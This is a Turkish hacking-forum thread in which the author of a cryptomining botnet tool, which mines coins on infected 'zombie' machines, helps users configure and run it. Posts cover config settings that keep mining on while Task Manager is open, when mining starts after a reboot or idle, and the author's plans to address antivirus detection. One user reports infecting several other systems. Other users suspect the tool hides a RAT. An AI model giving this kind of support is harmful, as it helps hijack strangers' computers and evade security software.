Crypto Coin Mining Botnet: Zombi sistemlerde kendi coininizi kazın

zalim5811

Üye
3 Eki 2012
72
30
Merhaba, Ben 1.4V dosyasını çektim ve config dosyasını şu şekilde ayarladım. Bir sorun çıkarır mı? sadece gpu varken dahi denediğimde (kendi bilgisayarımda test ettim) ring olarak görünmüyordu.
"gpu_enabled": true,
"cpu_enabled": true,
"mine_allthetime": true,
"pause_on_task_manager": false,
"maximum_allowed_thread_percentage": 60,

"mine_for": 1000,
"sleep_for": 500,
cpu_enabled diye bir şey yok, confige eklemek etkisiz.
onun dışında sorun yok. miningin başlaması için miner-ready exesi ilk açıldıktan sonra bilgisayarin yeniden başlatılması ya da idle'a girmesi gerek. gpu mining etkinleşmesi için de en az bi kere idle'a girmeli.

darkangell112

Yeni üye
14 Ara 2008
8
0
izmir
Tekrar merhaba,
Dediğiniz gibi düzenlemeri yaptım önce kendimde test ettim. Ring olarak göründü arkasından başka bir kaç sistemde bulaş yapmasını sağladım. Ama exe çalıştırıldığında yada daha çalıştırılmak için kopyalandığında microsoft system secure exe de trojen bulup sildi. İlginç ki kendi bilgisayarımda da microsoft sistem bulunmasına rağmen trojen olarak görmedi.
Merhaba, Ben 1.4V dosyasını çektim ve config dosyasını şu şekilde ayarladım. Bir sorun çıkarır mı? sadece gpu varken dahi denediğimde (kendi bilgisayarımda test ettim) ring olarak görünmüyordu.
"gpu_enabled": true,
"cpu_enabled": true,
"mine_allthetime": true,
"pause_on_task_manager": false,
"maximum_allowed_thread_percentage": 60,

"mine_for": 1000,
"sleep_for": 500,

C4n3r1

Yeni üye
10 Tem 2009
4
1
Hocam Selam,

Öncelikle eline ve emeğine sağlık. Fakat bende "config okunurken hata oluştu: expected value at line 1 colmn 1 diyor.

Burada hatanın görseli var.
xx

zalim5811

Üye
3 Eki 2012
72
30
Tekrar merhaba,
Dediğiniz gibi düzenlemeri yaptım önce kendimde test ettim. Ring olarak göründü arkasından başka bir kaç sistemde bulaş yapmasını sağladım. Ama exe çalıştırıldığında yada daha çalıştırılmak için kopyalandığında microsoft system secure exe de trojen bulup sildi. İlginç ki kendi bilgisayarımda da microsoft sistem bulunmasına rağmen trojen olarak görmedi.
Benim yaptığım testlerde de bulamamıştı. O konuda bir şeyler yapmayı dusunuyorum.
Hocam Selam,

Öncelikle eline ve emeğine sağlık. Fakat bende "config okunurken hata oluştu: expected value at line 1 colmn 1 diyor.

Burada hatanın görseli var.
xx
Config.jsonda sorun var. Json formatı bozulmuş ilk karakterde. Configi görürsem sorun ne söyleyebilirim.

zalim5811

Üye
3 Eki 2012
72
30
hocam bu program için statik ip vev port açmak gerekli mi
hayır

Hocam bu FTP yi nasıl kullanıcaz
configde açıkladım

merhaba miner in hangi kripto parayi kazdigini degistirebiliyormuyuz?
cpu ile kazılabilecek randomx'den daha karlı bir algoritma varsa değiştirebilirim

Merhabalar minerı kendi sistemimde denedim nicehashde göründü sonra nicehashden kaldırdım ve cleanerı açtım fakat 12kere mavi ekran verdi bende MiniDumplara baktım SDK kullanarak hata kodlarım bunlar:

Bu minerdan mı kaynaklıdır çözümünüz varmıdır teşekkür ederim.
alakasız

Bende ui.exe yi çalıştırdım bu kod çalıştırılıyor çünkü vcruntime 140 bulunamadı hatası versi
yeni versiyonda ui'a static vc runtime ekledim.

zeugma1420

Yeni üye
15 Kas 2021
11
2
Bu başlıktaki en yeni girdiler ve cevaplar neden siliniyor anlamış değilim.Bu işin içinde bir bit yeniği var arkadaşlar .

UcanBal

Yeni üye
25 Nis 2021
42
12
İzmir
Bu başlıktaki en yeni girdiler ve cevaplar neden siliniyor anlamış değilim.Bu işin içinde bir bit yeniği var arkadaşlar .
Benim tüm mesajlarım silindi bu başlıktan. Ve hiç bir açıklama yapılmadı. dosyaların incelenmesini istiyorum. cleaner gerçekten çalışıyor mu içinde rat var mı merak ediyorum. bu işte bir bit eniği var.

Son düzenleme:

zalim5811

Üye
3 Eki 2012
72
30
Benim tüm mesajlarım silindi bu başlıktan. Ve hiç bir açıklama yapılmadı. dosyaların incelenmesini istiyorum. cleaner gerçekten çalışıyor mu içinde rat var mı merak ediyorum. bu işte bir bit eniği var.
bi modun rastgele mesajlari silmesiyle cleanerda rat olabileceğini nasıl ilişkilendirdin kanka anlatsana. güzel thought process.

zeugma1420

Yeni üye
15 Kas 2021
11
2
Bana da öyle geliyor 7 sayfa onlarca mesaj vardı detaylı sorular ve açıklamalar hepsi silinmiş. Söylenenlerin hepsini birebir aynısını yapmama ve başlığı detaylı fotoğraflı soru sormama rağmen (fotolar ve sorularım diğer silininler gibi ) başlıktan silinmiş. Yayınlayan detaylı açıklama ve anlatım yada dosyayı sıkıntısız çalışana kadar KESİNLİKLE kimseye tavsiye etmiyorum !!!.

hocam ne diyosun bu işe, detaylı açıklamaları ve sence ne yapılmalı ? bunları duymayı ve anlatmanı çok isteri

Moderatör tarafında düzenlendi:

UcanBal

Yeni üye
25 Nis 2021
42
12
İzmir
Bu posttaki mesajlarımın tamamı neden silinmiş hangi mod sildiyse açıklama bekliyorum. Açıklama yapılmadan onca postun silinmesi ilginç. Neden silindiği incelensin. Kimin silindiği incelensin.

AlisOzkavak

Yeni üye
9 Şub 2019
26
2
Yazıları okudukça fark ettim sanırım bilgisayarımda bu tarz bir program olabilir, virüs koruma programı bulamıyor galiba bunun çözümü varmı nasıl kurtulabilirim yani ?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.